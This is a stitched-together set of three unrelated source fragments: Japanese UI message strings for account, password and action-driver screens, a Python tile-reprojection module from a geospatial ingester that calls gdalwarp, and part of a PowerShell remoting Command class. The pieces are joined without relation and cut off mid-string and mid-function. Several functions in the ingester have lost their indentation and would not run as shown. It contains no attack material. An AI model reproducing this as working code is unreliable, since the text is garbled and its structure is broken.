Ary['MOSEN27012'] = "アクション設定が存在しません。<br />追加したいdriverを選択し、[追加]をクリックして設定してください。"
Ary['MOSEN27013'] = "ドライバーがインストールされていません。<br />ドライバーをインストールするとアクション設定情報が表示されます。"
Ary['MOSEN27014'] = "アクション先が設定されていません。<br />権限がある場合は、[アクション先の追加]をクリックすると設定編集できます。"
Ary['MOSEN27015'] = "アクション設定"
Ary['MOSEN27016'] = "アクション先の追加"
Ary['MOSEN27017'] = "アクション先の選択"
Ary['MOSEN27018'] = "名前"
Ary['MOSEN27019'] = "プロトコル"
Ary['MOSEN27020'] = "ホスト/IP"
Ary['MOSEN27021'] = "ポート"
Ary['MOSEN27022'] = "ユーザ名"
Ary['MOSEN27023'] = "パスワード"
Ary['MOSEN27024'] = "戻る"
Ary['MOSEN27025'] = "smtpサーバ"
Ary['MOSEN27026'] = "削除するとルールに記載されているアクションでも実行できなくなります。\n保存してもよろしいですか?"
Ary['MOSEN27027'] = "編集可能なグループが存在しません。"
Ary['MOSEN27028'] = "設定値"
Ary['MOSEN27029'] = "現在の設定値"
# MOSEN271xx: ITA action-driver settings validation.
Ary['MOSEN27101'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN27102'] = "名前は64文字以内で入力してください。"
Ary['MOSEN27103'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN27104'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN27105'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN27106'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN27107'] = "必須項目(ユーザ名)が入力されていません。入力してください。"
Ary['MOSEN27108'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN27109'] = "必須項目(パスワード)が入力されていません。入力してください。"
Ary['MOSEN27110'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN27111'] = "他のITAアクション名と重複しています。修正してください。"
Ary['MOSEN27112'] = "他のホスト名と重複しています。修正してください。"
Ary['MOSEN27113'] = "2つのパスワード入力が一致していません。同じパスワードを入力してください。"
Ary['MOSEN27115'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN27116'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN27118'] = "保存されました。"
Ary['MOSEN27119'] = "ITAの疎通確認に失敗しました。"
Ary['MOSEN27120'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN27121'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN27122'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN27123'] = "パスワードに使用できない文字が含まれています。"
# MOSEN272xx: mail action-driver settings validation.
Ary['MOSEN27201'] = "必須項目(名前)が入力されていません。入力してください。"
Ary['MOSEN27202'] = "名前は64文字以内で入力してください。"
Ary['MOSEN27203'] = "必須項目(ホスト名)が入力されていません。入力してください。"
Ary['MOSEN27204'] = "ホスト名は128文字以内で入力してください。"
Ary['MOSEN27205'] = "必須項目(ポート)が入力されていません。入力してください。"
Ary['MOSEN27206'] = "ポートは、0~65535までの数値を入力してください。"
Ary['MOSEN27207'] = "ユーザ名は64文字以内で入力してください。"
Ary['MOSEN27208'] = "パスワードは64文字以内で入力してください。"
Ary['MOSEN27209'] = "他のメールアクション名と重複しています。修正してください。"
Ary['MOSEN27212'] = "必須項目(プロトコル)が入力されていません。入力してください。"
Ary['MOSEN27213'] = "プロトコルは64文字以内で入力してください。"
Ary['MOSEN27214'] = "DBの更新に失敗しました。"
Ary['MOSEN27215'] = "mailの疎通確認に失敗しました。"
Ary['MOSEN27216'] = "名前に使用できない文字が含まれています。"
Ary['MOSEN27217'] = "ホスト名に使用できない文字が含まれています。"
Ary['MOSEN27218'] = "ユーザ名に使用できない文字が含まれています。"
Ary['MOSEN27219'] = "パスワードに使用できない文字が含まれています。"
Ary['MOSEN27220'] = "2つのパスワード入力が一致していません。同じパスワードを入力してください。"
# MOSEN273xx: message-extraction definition screen (ITA driver).
Ary['MOSEN27300'] = "アクション設定に戻る"
Ary['MOSEN27301'] = "ドライバ名"
Ary['MOSEN27302'] = "メニューグループID"
Ary['MOSEN27303'] = "メニューID"
Ary['MOSEN27304'] = "パラメータ名"
Ary['MOSEN27305'] = "順序"
Ary['MOSEN27306'] = "抽出対象条件名"
Ary['MOSEN27307'] = "抽出方法1"
Ary['MOSEN27308'] = "抽出方法2"
Ary['MOSEN27309'] = "メッセージ抽出定義が存在しません。<br>権限がある場合は、[編集]をクリックするとメッセージ抽出定義を登録することができます。"
Ary['MOSEN27310'] = "リクエストが不正です。"
Ary['MOSEN27311'] = "DBの更新に失敗しました。"
Ary['MOSEN27312'] = "更新対象のレコードは既に削除されています。"
Ary['MOSEN27313'] = "指定のドライバ名は存在しません。"
Ary['MOSEN27314'] = "ドライバ名、メニューグループID、メニューID、順序の組み合わせが重複しています。一意の値を指定してください。"
Ary['MOSEN27315'] = "必須項目(ドライバ名)が選択されていません。選択してください。"
Ary['MOSEN27316'] = "必須項目(メニューグループID)が入力されていません。入力してください。"
Ary['MOSEN27317'] = "必須項目(メニューグループ:メニュー)が選択されていません。選択してください。"
Ary['MOSEN27318'] = "必須項目(パラメータ名)が入力されていません。入力してください。"
Ary['MOSEN27319'] = "パラメータ名は256文字以内で入力してください。"
Ary['MOSEN27320'] = "必須項目(順序)が入力されていません。入力してください。"
Ary['MOSEN27321'] = "必須項目(抽出対象条件名)が入力されていません。入力してください。"
Ary['MOSEN27322'] = "抽出対象条件名は32文字以内で入力してください。"
Ary['MOSEN27323'] = "抽出方法1は512文字以内で入力してください。"
Ary['MOSEN27324'] = "抽出方法2は512文字以内で入力してください。"
Ary['MOSEN27325'] = "リセットします。\nよろしいですか?"
Ary['MOSEN27326'] = "入力値が正しくありません。\n入力内容を確認してください。"
Ary['MOSEN27327'] = "対象データがありません。"
Ary['MOSEN27328'] = "エラーが発生しました。"
Ary['MOSEN27329'] = "メニューグループ:メニュー"
Ary['MOSEN27330'] = "DBから値の取得に失敗しました。"
Ary['MOSEN27331'] = "アクション設定画面に遷移します。"
Ary['MOSEN27332'] = "メッセージ抽出定義の編集画面に遷移します。"
Ary['MOSEN27333'] = "変更内容を破棄してメッセージ抽出定義編集画面を閉じ、メッセージ抽出定義画面に戻ります。"
Ary['MOSEN27334'] = "値を変更する前のメッセージ抽出定義編集画面に戻ります。"
Ary['MOSEN27335'] = "編集欄が1行追加されます。"
Ary['MOSEN27336'] = "新規追加、更新、削除のレコードを保存してメッセージ抽出定義参照画面に遷移します。"
Ary['MOSEN27337'] = "ドライバー名を選択してください。"
Ary['MOSEN27338'] = "ITA連携先のメニュー名を選択してください。"
Ary['MOSEN27339'] = "256文字以内で入力してください。"
Ary['MOSEN27340'] = "「ホスト名」は0を指定してください。"
Ary['MOSEN27341'] = "32文字以内で入力してください。"
Ary['MOSEN27342'] = "512文字以内で入力してください。"
Ary['MOSEN27343'] = "512文字以内で入力してください。"
Ary['MOSEN27344'] = "アクション設定画面で追加したITAドライバ名が表示されます。"
Ary['MOSEN27345'] = "連携を行うITAメニュー名が表示されます。"
Ary['MOSEN27346'] = "抽出項目名が表示されます。"
Ary['MOSEN27347'] = "ITAにて設定したメニューの項目順序が表示されます。"
Ary['MOSEN27348'] = "抽出対象となるディシジョンテーブルファイルの条件名が表示されます。"
Ary['MOSEN27349'] = "抽出対象に対して実施する正規表現が表示されます。"
Ary['MOSEN27350'] = "抽出方法1の結果に対して切り取る文字列が表示されます。"
Ary['MOSEN27351'] = "メッセージ抽出定義の編集権限がありません。"
# MOSEN310xx: account settings — e-mail address / password change screens.
Ary['MOSEN31001'] = "入力された情報を破棄します。\nよろしいですか?"
Ary['MOSEN31002'] = "パスワードを変更します。\nよろしいですか?"
Ary['MOSEN31003'] = "メールアドレスを変更します。\nよろしいですか?"
Ary['MOSEN31004'] = "メールアドレスが入力されていません。入力してください。"
Ary['MOSEN31005'] = "メールアドレスは256文字以内で入力してください。"
Ary['MOSEN31006'] = "メールアドレスが不正です。修正してください。"
Ary['MOSEN31007'] = "他のメールアドレスと重複しています。修正してください。"
Ary['MOSEN31008'] = "現在のメールアドレスが入力されています。修正してください。"
Ary['MOSEN31009'] = "不正なリクエストです。"
Ary['MOSEN31010'] = "メールアドレスの変更に失敗しました。"
Ary['MOSEN31011'] = "他のユーザーが既に使用しているメールアドレスのため、変更に失敗しました。"
Ary['MOSEN31012'] = "既にメールアドレスの変更が完了しています。"
Ary['MOSEN31013'] = "メールアドレスを変更しました。"
Ary['MOSEN31014'] = "メールアドレスの変更申請に失敗しました。"
Ary['MOSEN31015'] = "メールアドレスの変更確定に失敗しました。"
Ary['MOSEN31016'] = "メールアドレス変更の有効期限を過ぎています。"
Ary['MOSEN31017'] = "メールアドレスの変更を承りました。\n入力されましたメールアドレスに通知が届きます。\nそちらに記載されたURLへアクセスすることで、\nメールアドレスの変更が確定されます。"
Ary['MOSEN31018'] = "メールアドレスに使用できない文字が含まれています。"
Ary['MOSEN31019'] = "アカウント情報"
Ary['MOSEN31020'] = "メールアドレスの変更"
Ary['MOSEN31021'] = "パスワードの変更"
Ary['MOSEN31022'] = "画面設定"
Ary['MOSEN31023'] = "基本情報"
Ary['MOSEN31024'] = "メールアドレスを変更するにはパスワードが必要です。"
Ary['MOSEN31025'] = "パスワード"
Ary['MOSEN31026'] = "8文字以上64文字以内で入力してください。"
Ary['MOSEN31027'] = "変更すると、新しいメールアドレスに認証メールが届きます。"
Ary['MOSEN31028'] = "新しいメールアドレス"
Ary['MOSEN31029'] = "メールアドレスを変更する"
Ary['MOSEN31030'] = "パスワードを変更します。"
Ary['MOSEN31031'] = "現在のパスワード"
Ary['MOSEN31032'] = "最低8文字以上"
# Raw string: the message text itself contains backslash characters.
Ary['MOSEN31033'] = r"半角英字(大文字)、半角英字(小文字)、半角数字、記号(!#$%%&()*+,-./;<=>?@\[]^_{}|~)を含む"
Ary['MOSEN31034'] = "過去"
Ary['MOSEN31035'] = "世代で同一パスワードは設定不可"
Ary['MOSEN31036'] = "新しいパスワード"
Ary['MOSEN31037'] = "新しいパスワード再入力"
Ary['MOSEN31038'] = "パスワードを変更する"
Ary['MOSEN31039'] = "認証するまでメールアドレスは変更されません。"
Ary['MOSEN31040'] = "変更されました。"
# MOSEN320xx: password change / reset (incl. one-time password flow).
Ary['MOSEN32000'] = "パスワード変更"
Ary['MOSEN32001'] = "パスワードの有効期間が過ぎています。パスワード変更をお願いします。"
Ary['MOSEN32002'] = "既存のパスワードと新パスワードを入力してください。"
Ary['MOSEN32003'] = "8文字以上、64文字以下"
Ary['MOSEN32004'] = r"半角英字(大文字)、半角英字(小文字)、半角数字、記号(!#$%%&()*+,-./;<=>?@\[]^_{}|~)を含む"
# %(strConName)s placeholders are filled in by the caller at display time.
Ary['MOSEN32005'] = "過去%(strConName)s世代で同一パスワードは設定できません。"
Ary['MOSEN32006'] = "パスワードを変更します。\nよろしいですか?"
Ary['MOSEN32007'] = "変更されました。"
Ary['MOSEN32008'] = "エラーが発生しました。\n"
Ary['MOSEN32009'] = "不正なリクエストです。"
Ary['MOSEN32010'] = "*ユーザが取得できません。"
Ary['MOSEN32011'] = "*パスワード設定が取得できません。"
Ary['MOSEN32012'] = "*既存のパスワードが入力されていません。"
Ary['MOSEN32013'] = "*既存のパスワードが一致しません。"
Ary['MOSEN32014'] = "*新パスワードが入力されていません。"
Ary['MOSEN32015'] = "*大小英文字・数字・記号の全てを含めた8文字以上のパスワードを設定してください。"
Ary['MOSEN32016'] = "*新パスワードが一致していません。"
Ary['MOSEN32017'] = "*パスワード履歴が取得できません。"
Ary['MOSEN32018'] = "*入力されたパスワードは制限されています。"
Ary['MOSEN32019'] = "DBの更新に失敗しました。"
Ary['MOSEN32020'] = "初期パスワードからの変更をお願いします。"
Ary['MOSEN32021'] = "初期パスワードと新パスワードを入力してください。"
Ary['MOSEN32022'] = "パスワードは次の条件が必要です。"
Ary['MOSEN32023'] = "ワンタイムパスワードの期限を超過しました。[パスワードをお忘れの場合]をクリックすると再設定できます。"
Ary['MOSEN32024'] = "パスワードリセット"
Ary['MOSEN32025'] = "登録されているログインIDとメールアドレスを入力してください。"
Ary['MOSEN32026'] = "入力されたメールアドレスに対して、ワンタイムパスワードを通知します。"
Ary['MOSEN32027'] = "ワンタイムパスワードの有効期限は、%(strConName)s時間です。"
Ary['MOSEN32028'] = "%(strConName)s時間以上経過するとワンタイムパスワードは、無効となるため、再度パスワードリセットを行ってください。"
Ary['MOSEN32029'] = "変更を破棄してパスワードリセットへ移動しますがよろしいですか?"
Ary['MOSEN32030'] = "パスワードリセットを中断しますがよろしいですか?"
Ary['MOSEN32031'] = "ログインIDが存在しません。再入力してください。ユーザ登録が必要な場合は、システム管理者へ依頼してください。"
Ary['MOSEN32032'] = "登録されているメールアドレスと一致しません。再入力してください。メールアドレスの変更が必要な場合は、システム管理者へ依頼してください。"
Ary['MOSEN32033'] = "入力された情報を破棄します。\nよろしいですか?"
Ary['MOSEN32034'] = "ワンタイムパスワードからの変更をお願いします。"
Ary['MOSEN32035'] = "ワンタイムパスワードと新パスワードを入力してください。"
Ary['MOSEN32036'] = "パスワードをリセットします。\nよろしいですか?"
Ary['MOSEN32037'] = "パスワードがリセットされました。"
Ary['MOSEN32038'] = "パスワードが一致しません。"
Ary['MOSEN32039'] = "既存のパスワード"
Ary['MOSEN32040'] = "新規のパスワード"
Ary['MOSEN32041'] = "新規のパスワードの再入力"
Ary['MOSEN32042'] = "変更"
Ary['MOSEN32043'] = "ログインIDをお忘れの場合はお問い合わせください。"
Ary['MOSEN32044'] = "パスワードをリセット"
# MOSEN330xx: account-lock release screen.
Ary['MOSEN33000'] = "アカウントをロックされているユーザは存在しません。"
Ary['MOSEN33001'] = "解除するユーザが存在しません。\n入力内容を確認してください。"
Ary['MOSEN33002'] = "解除に失敗しました。"
Ary['MOSEN33003'] = "エラーが発生しました。"
Ary['MOSEN33004'] = "権限がないため解除に失敗しました。\nシステム設定画面のパスワード設定項目にて、メール通知対象となっているかご確認ください。"
Ary['MOSEN33005'] = "Account | |
<filename>agdc/abstract_ingester/tile_contents.py
#!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
TileContents: database interface class.
These classes provide an interface between the database and the top-level
ingest algorithm (AbstractIngester and its subclasses). They also provide
the implementation of the database and tile store side of the ingest
process. They are expected to be independent of the structure of any
particular dataset, but will change if the database schema or tile store
format changes.
"""
from __future__ import absolute_import
import shutil
import logging
import os
import re
from datetime import datetime
from osgeo import gdal
import numpy as np
from eotools.execute import execute
from eotools.utils import log_multiline
from ..cube_util import DatasetError, create_directory, get_file_size_mb
# Set up LOGGER.
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
#
# Constants for PQA nodata check:
#
PQA_CONTIGUITY = 256 # contiguity = bit 8 of the PQA bit mask
GDAL_CACHEMAX_MB = 500  # gdalwarp raster block cache (--config GDAL_CACHEMAX)
# Working buffers (in MB)
# GDAL_WM_MB = 500
class TileContents(object):
    """Represents one tile produced during ingestion.

    Handles reprojection of the source band stack onto the tile grid, the
    empty-tile check, and moving the finished tile from its provisional
    (temporary) location to its permanent output path.
    """
    # pylint: disable=too-many-instance-attributes

    def __init__(self, tile_output_path, tile_type_info,
                 tile_footprint, provisional_directory, band_stack):
        """Set the tile_footprint over which we want to resample this dataset.

        :param tile_output_path: permanent path for the finished tile file
        :param tile_type_info: dict of tile-type parameters (origin, size,
            pixel sizes, CRS, file format/extension, format options)
        :param tile_footprint: (x, y) index of this tile in the tile grid
        :param provisional_directory: directory holding the temporary tile
            until make_permanent() is called
        :type band_stack: AbstractBandstack
        """
        self.tile_type_id = tile_type_info['tile_type_id']
        self.tile_type_info = tile_type_info
        self.tile_footprint = tile_footprint
        self._band_stack = band_stack
        self.tile_output_path = tile_output_path
        # Set the provisional tile location to be the same as the vrt created
        # for the scenes.
        self._temp_tile_output_path = os.path.join(
            provisional_directory, os.path.basename(self.tile_output_path))
        # Work-around to allow existing GDAL code to work with netCDF
        # subdatasets as band stacks.
        # N.B: file_extension must be set to ".vrt" when used with netCDF
        # TODO: Change all code to use netCDF libraries instead of GDAL for
        # netCDF file handling
        if (self.tile_type_info['file_format'] == 'netCDF'
                and tile_type_info['file_extension'] == '.vrt'):
            # BUG FIX: use raw strings for the regex - '\.vrt$' is an
            # invalid escape sequence on Python 3.6+.
            self.nc_temp_tile_output_path = re.sub(
                r'\.vrt$', '.nc', self._temp_tile_output_path)
            self.nc_tile_output_path = re.sub(
                r'\.vrt$', '.nc', self.tile_output_path)
        else:
            self.nc_temp_tile_output_path = None
            self.nc_tile_output_path = None

    @property
    def tile_extents(self):
        """(xmin, ymin, xmax, ymax) of this tile in the tile-type CRS."""
        return _tile_extents(self.tile_footprint, self.tile_type_info)

    def has_data(self):
        """Return True if the reprojected tile contains any valid data.

        :raises DatasetError: if the reprojected tile does not exist yet
        """
        if not os.path.exists(self._temp_tile_output_path):
            raise DatasetError('No reprojected tile has been produced.')
        return _has_data(self._temp_tile_output_path, self._band_stack)

    def reproject(self):
        """Reproject the scene dataset into tile coordinate reference system
        and extent. This method uses gdalwarp to do the reprojection."""
        # Work-around to allow existing code to work with netCDF subdatasets
        # as GDAL band stacks.
        temp_tile_output_path = (self.nc_temp_tile_output_path
                                 or self._temp_tile_output_path)
        _reproject(self.tile_type_info, self.tile_footprint,
                   self._band_stack, temp_tile_output_path)
        # Wrap the netCDF output in a .vrt so GDAL sees a plain band stack.
        if self.nc_temp_tile_output_path:
            _nc2vrt(self.nc_temp_tile_output_path, temp_tile_output_path)

    def remove(self):
        """Remove tiles that were in coverage but have no data. Also remove
        tiles if we are rolling back the transaction."""
        if os.path.isfile(self._temp_tile_output_path):
            os.remove(self._temp_tile_output_path)

    def make_permanent(self):
        """Move the tile file to its permanent location."""
        if os.path.exists(self.tile_output_path) \
                and not os.path.exists(self._temp_tile_output_path) \
                and self.nc_temp_tile_output_path is None:
            LOGGER.info('Tile already in place: %r', self.tile_output_path)
            return
        source_dir = os.path.abspath(
            os.path.dirname(self._temp_tile_output_path))
        dest_dir = os.path.abspath(os.path.dirname(self.tile_output_path))
        create_directory(dest_dir)
        # If required, edit paths in the re-written .vrt file and move the
        # .nc file alongside it.
        if self.nc_tile_output_path:
            # BUG FIX: use context managers so the file handles are closed
            # even if the read/write raises.
            with open(self._temp_tile_output_path, 'r') as vrt_file:
                vrt_string = vrt_file.read()
            # Update all paths in VRT file to the permanent directory.
            vrt_string = vrt_string.replace(source_dir, dest_dir)
            with open(self.tile_output_path, 'w') as vrt_file:
                vrt_file.write(vrt_string)
            # Move .nc file
            shutil.move(self.nc_temp_tile_output_path,
                        self.nc_tile_output_path)
        else:  # No .vrt file required - just move the tile file
            shutil.move(self._temp_tile_output_path, self.tile_output_path)

    def get_output_path(self):
        """Return the final location for the tile."""
        return self.tile_output_path

    def get_output_size_mb(self):
        """Return the size (in MB) of the temporary tile if it still exists,
        otherwise of the permanent tile."""
        path = self._temp_tile_output_path
        if not os.path.exists(path):
            path = self.tile_output_path
        return get_file_size_mb(path)
def _tile_extents(tile_footprint, tile_type_info):
x_origin = tile_type_info['x_origin']
y_origin = tile_type_info['y_origin']
x_size = tile_type_info['x_size']
y_size = tile_type_info['y_size']
x0 = x_origin + tile_footprint[0] * x_size
y0 = y_origin + tile_footprint[1] * y_size
return x0, y0, x0 + x_size, y0 + y_size
def _make_format_spec(tile_type_info):
format_spec = []
for format_option in tile_type_info['format_options'].split(','):
format_spec.extend(["-co", "%s" % format_option])
return format_spec
def _create_reproject_command(band_stack, first_file_number, nodata_value,
                              temp_tile_output_path, tile_footprint,
                              tile_type_info):
    """Build the gdalwarp command line (as an argument list) that
    reprojects the band stack onto the tile grid.

    :param band_stack: band stack supplying the source VRT name and the
        per-band resampling method
    :param first_file_number: key into band_stack.band_dict whose
        resampling method is applied to all bands
    :param nodata_value: nodata value passed to gdalwarp, or None
    :param temp_tile_output_path: path the warped tile is written to
    :param tile_footprint: (x, y) tile index used to compute the extents
    :param tile_type_info: dict of tile-type parameters
    :return: list of command-line tokens for gdalwarp
    """
    resampling_method = (
        band_stack.band_dict[first_file_number]['resampling_method']
    )
    if nodata_value is not None:
        # TODO: Check this works for PQA, where
        # band_dict[10]['resampling_method'] == None
        nodata_spec = [
            "-srcnodata",
            "%d" % nodata_value,
            "-dstnodata",
            "%d" % nodata_value
        ]
    else:
        nodata_spec = []
    tile_extents = _tile_extents(tile_footprint, tile_type_info)
    reproject_cmd = [
        "gdalwarp",
        '--config', 'GDAL_CACHEMAX', str(GDAL_CACHEMAX_MB),
        # Changing the warp memory size altered pixel values. Disable until
        # further tests are performed.
        # '-wm', str(GDAL_WM_MB),
        "-q",
        "-of",
        "%s" % tile_type_info['file_format'],
        "-t_srs",
        "%s" % tile_type_info['crs'],
        "-te",
        "%f" % tile_extents[0],
        "%f" % tile_extents[1],
        "%f" % tile_extents[2],
        "%f" % tile_extents[3],
        "-tr",
        "%f" % tile_type_info['x_pixel_size'],
        "%f" % tile_type_info['y_pixel_size'],
        "-tap",
        "-tap",  # NOTE(review): "-tap" was repeated in the original; gdalwarp
                 # tolerates the duplicate, so it is kept to preserve behavior.
        "-r",
        "%s" % resampling_method,
    ]
    reproject_cmd.extend(nodata_spec)
    reproject_cmd.extend(_make_format_spec(tile_type_info))
    reproject_cmd.extend([
        "-overwrite",
        "%s" % band_stack.vrt_name,
        "%s" % temp_tile_output_path  # Use locally-defined output path
    ])
    # BUG FIX: the command list was built but never returned, so callers
    # (e.g. _reproject) received None and crashed on ' '.join(...).
    return reproject_cmd
def _reproject(tile_type_info, tile_footprint, band_stack, output_path):
    """Run gdalwarp to reproject the band stack onto the tile grid.

    Retries through an uncompressed intermediate file when gdalwarp fails
    to write an LZW-compressed GeoTIFF directly.

    :raises DatasetError: if gdalwarp fails for any other reason
    """
    nodata_value = band_stack.nodata_list[0]
    # Assume resampling method is the same for all bands, this is
    # because resampling_method is per processing_level
    # TODO assert this is the case
    # BUG FIX: dict.keys() is not subscriptable on Python 3; take the first
    # key via an iterator instead (also works on Python 2).
    first_file_number = next(iter(band_stack.band_dict))
    reproject_cmd = _create_reproject_command(
        band_stack, first_file_number, nodata_value,
        output_path, tile_footprint, tile_type_info)
    command_string = ' '.join(reproject_cmd)
    LOGGER.info('Performing gdalwarp for tile %s', tile_footprint)
    retry = True
    while retry:
        LOGGER.debug('command_string = %s', command_string)
        start_datetime = datetime.now()
        result = execute(command_string)
        LOGGER.debug('gdalwarp time = %s', datetime.now() - start_datetime)
        if result['stdout']:
            log_multiline(LOGGER.debug, result['stdout'],
                          'stdout from ' + command_string, '\t')
        if result['returncode']:  # Return code is non-zero
            log_multiline(LOGGER.error, result['stderr'],
                          'stderr from ' + command_string, '\t')
            # Work-around for gdalwarp error writing LZW-compressed GeoTIFFs:
            # write an uncompressed tile, then gdal_translate it to the final
            # compressed tile on the next loop iteration.
            # NOTE(review): if the modified command also fails with an LZW
            # error, this loop keeps retrying - confirm whether a retry limit
            # is wanted before changing long-standing behavior.
            if (result['stderr'].find('LZW') > -1  # LZW-related error
                    and tile_type_info['file_format'] == 'GTiff'
                    and 'COMPRESS=LZW' in tile_type_info['format_options']):
                uncompressed_tile_path = output_path + '.tmp'
                # Write uncompressed tile to a temporary path
                command_string = command_string.replace(
                    'COMPRESS=LZW', 'COMPRESS=NONE')
                command_string = command_string.replace(
                    output_path, uncompressed_tile_path)
                # Translate temporary uncompressed tile to final compressed
                # tile
                command_string += '; gdal_translate -of GTiff'
                command_string += ' ' + ' '.join(
                    _make_format_spec(tile_type_info))
                command_string += ' %s %s' % (
                    uncompressed_tile_path,
                    output_path
                )
                LOGGER.info('Creating compressed GeoTIFF tile via temporary uncompressed GeoTIFF')
            else:
                raise DatasetError('Unable to perform gdalwarp: ' +
                                   '"%s" failed: %s' % (command_string,
                                                        result['stderr']))
        else:
            retry = False  # No retry on success
def _nc2vrt(nc_path, vrt_path):
    """Create a VRT file to present a netCDF file with multiple subdatasets
    to GDAL as a band stack."""
    # gdalbuildvrt is given absolute paths so the generated VRT stays valid
    # regardless of the current working directory.
    command = ("gdalbuildvrt -separate -allow_projection_difference "
               "-overwrite %s %s" % (os.path.abspath(vrt_path),
                                     os.path.abspath(nc_path)))
    LOGGER.debug('nc2vrt_cmd = %s', command)
    result = execute(command)
    if result['returncode'] != 0:
        raise DatasetError('Unable to perform gdalbuildvrt: ' +
                           '"%s" failed: %s' % (command, result['stderr']))
def _has_data(tile_path, band_stack):
"""Check if the reprojection gave rise to a tile with valid data.
Open the file and check if there is data
:type tile_path: str
:type band_stack: AbstractBandStack
"""
tile_dataset = gdal.Open(tile_path)
start_datetime = datetime.now()
if tile_dataset.RasterCount != len(band_stack.band_dict):
raise DatasetError(
(
"Number of layers (%d) in tile file\n %s\n"
"does not match number of bands "
"(%d) from database."
) % (
tile_dataset.RasterCount,
tile_path,
len(band_stack.band_dict)
)
)
# Convert self.band_stack.band_dict into list of elements sorted by tile_layer
band_list = [
band_stack.band_dict[file_number]
for file_number in sorted(
band_stack.band_dict.keys(),
key=lambda f_number: band_stack.band_dict[f_number]['tile_layer']
)
]
result = False
# Read each band in individually - will be quicker for non-empty tiles but slower for empty ones
for band_index in range(tile_dataset.RasterCount):
| |
behaviour of where to merge the
'merge_my_result' stream. Only supports NONE or OUTPUT (only used
in protocol 2.1)
:param merge_previous: Controls the behaviour of where to merge the
previous Output and Error streams that have been unclaimed
:param merge_error: The merge behaviour of the Error stream
:param merge_warning: The merge behaviour of the Warning stream
:param merge_verbose: The merge behaviour of the Verbose stream
:param merge_debug: The merge behaviour of the Debug stream
:param merge_information: The merge behaviour of the Information stream
:param args: List of CommandParameters for the cmdlet being invoked
:param end_of_statement: Whether this command is the last in the
current statement
"""
super(Command, self).__init__()
arg_types = [
"System.Collections.Generic.List`1[["
"System.Management.Automation.PSObject, "
"System.Management.Automation, "
"Version=1.0.0.0, Culture=neutral, "
"PublicKeyToken=31bf3856ad364e35]]",
"System.Object",
]
extended_properties = [
('cmd', ObjectMeta("S", name="Cmd")),
('is_script', ObjectMeta("B", name="IsScript")),
('use_local_scope', ObjectMeta("B", name="UseLocalScope")),
('merge_my_result', ObjectMeta("Obj", name="MergeMyResult",
object=PipelineResultTypes)),
('merge_to_result', ObjectMeta("Obj", name="MergeToResult",
object=PipelineResultTypes)),
('merge_previous', ObjectMeta("Obj", name="MergePreviousResults",
object=PipelineResultTypes)),
('args', ListMeta(
name="Args",
list_value_meta=ObjectMeta(object=CommandParameter),
list_types=arg_types)
),
]
if version_equal_or_newer(protocol_version, "2.2"):
extended_properties.extend([
('merge_error', ObjectMeta("Obj", name="MergeError",
object=PipelineResultTypes,
optional=True)),
('merge_warning', ObjectMeta("Obj", name="MergeWarning",
object=PipelineResultTypes,
optional=True)),
('merge_verbose', ObjectMeta("Obj", name="MergeVerbose",
object=PipelineResultTypes,
optional=True)),
('merge_debug', ObjectMeta("Obj", name="MergeDebug",
object=PipelineResultTypes,
optional=True)),
])
if version_equal_or_newer(protocol_version, "2.3"):
extended_properties.extend([
('merge_information', ObjectMeta(
"Obj", name="MergeInformation",
object=PipelineResultTypes,
optional=True
)),
])
self._extended_properties = extended_properties
self.protocol_version = protocol_version
self.cmd = kwargs.get("cmd")
self.is_script = kwargs.get("is_script")
self.use_local_scope = kwargs.get("use_local_scope")
none_merge = PipelineResultTypes(value=PipelineResultTypes.NONE)
# valid in all protocols, only really used in 2.1 (PowerShell 2.0)
self.merge_my_result = kwargs.get("merge_my_result", none_merge)
self.merge_to_result = kwargs.get("merge_to_result", none_merge)
self.merge_previous = kwargs.get("merge_previous", none_merge)
# only valid for 2.2+ (PowerShell 3.0+)
self.merge_error = kwargs.get("merge_error", none_merge)
self.merge_warning = kwargs.get("merge_warning", none_merge)
self.merge_verbose = kwargs.get("merge_verbose", none_merge)
self.merge_debug = kwargs.get("merge_debug", none_merge)
# only valid for 2.3+ (PowerShell 5.0+)
self.merge_information = kwargs.get("merge_information", none_merge)
self.args = kwargs.get("args", [])
# not used in the serialized message but controls how Pipeline is
# packed (Cmds/ExtraCmds)
self.end_of_statement = kwargs.get("end_of_statement", False)
class CommandParameter(ComplexObject):

